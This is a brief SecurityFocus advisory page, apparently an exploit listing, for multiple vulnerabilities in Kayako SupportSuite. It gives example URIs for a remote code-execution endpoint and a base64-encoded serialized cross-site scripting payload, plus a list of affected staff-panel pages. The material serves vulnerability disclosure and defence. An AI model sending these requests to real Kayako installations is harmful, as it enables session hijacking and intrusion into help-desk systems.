Kayako SupportSuite Multiple Vulnerabilities

The following example URIs are available:

Remote code-execution:
http://www.example.com/support/admin/index.php?_m=core&_a=edittemplate&templateid=11&templateupdate=register

Cross-site scripting:
http://www.example.com/support/staff/index.php?_m=news&_a=managesubscribers&importsub=1&resultdata=YTo0OntzOjEzOiJzdWNjZXNzZW1haWxzIjtpOjA7czoxMjoiZmFpbGVkZW1haWxzIjtpOjE7czoxMToidG90YWxlbWFpbHMiO2k6MTtzOjk6ImVtYWlsbGlzdCI7czo5MDoiPHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD5APHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4uPHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4gIjt9

http://www.example.com/support/staff/index.php?_m=news&_a=managenews

http://www.example.com/support/staff/index.php?_m=troubleshooter&_a=managecategories

http://www.example.com/support/staff/index.php?_m=downloads&_a=managefiles

http://www.example.com/support/staff/index.php?_m=teamwork&_a=editcontact&contactid=[added contact ID]

http://www.example.com/support/staff/index.php?_m=livesupport&_a=adtracking

http://www.example.com/support/staff/index.php?_m=livesupport&_a=managecannedresponses

http://www.example.com/support/staff/index.php?_m=tickets&_a=managealerts

http://www.example.com/support/staff/index.php?_m=tickets&_a=managefilters


 

Privacy Statement
Copyright 2010, SecurityFocus